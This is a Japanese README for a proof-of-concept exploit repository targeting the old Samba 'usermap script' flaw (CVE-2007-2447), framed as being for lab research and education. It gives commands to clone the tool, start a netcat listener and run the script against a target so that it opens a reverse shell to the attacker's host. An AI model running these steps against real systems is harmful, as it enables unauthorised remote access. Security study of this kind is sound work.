
Samba usermapスクリプトリモートコマンド実行 (CVE-2007-2447) の概念実証エクスプロイト。制御されたラボテストとセキュリティ研究のためのリバースシェル機能付き。
PoC: Sambaの「usermap script」によるリモートコマンド実行(歴史的なCVE)。このリポジトリには、研究および教育目的のレビュー用の小さな概念実証スクリプトが含まれています。主要なスクリプトは usermap_script_Command_Execution.py です。
参考記事: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
リポジトリをクローンし、管理されたラボ環境でスクリプトを実行してください。このPoCは任意で LHOST:LPORT へのリバースシェルを使用します。スクリプトを実行する前にリスナーを起動し、依存関係がインストールされていることを確認してください(インストールを参照)。
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>
パラメータ
RHOST — ターゲットのIPアドレスまたはホスト名RPORT — ターゲットのTCPポート(通常は 139)LHOST — リバース接続用のリスナーIPLPORT — リスナーポート推奨:スクリプトを実行する前に、分離されたPython仮想環境を作成し、requirements.txt から依存関係をインストールしてください。
python3 -m venv exploit_env
source exploit_env/bin/activate
pip install -r requirements.txt
このコードは、正当なセキュリティ研究、教育、および防御的テストのためだけに提供されています。所有しているシステム、または明示的な書面によるテスト許可を得たシステム以外に対して、このスクリプトを実行しないでください。誤用は法的結果を招く可能性があります。リポジトリ所有者は誤用について責任を負いません。
潜在的に危険なコードを分析する際は、常に静的コードレビューと管理されたラボテスト(VMスナップショット、隔離されたネットワーク、パケットキャプチャ)を優先してください。
実行不可能な注釈付きウォークスルーまたは requirements.txt が必要な場合は、Issueを開くか、ここでリクエストしてください。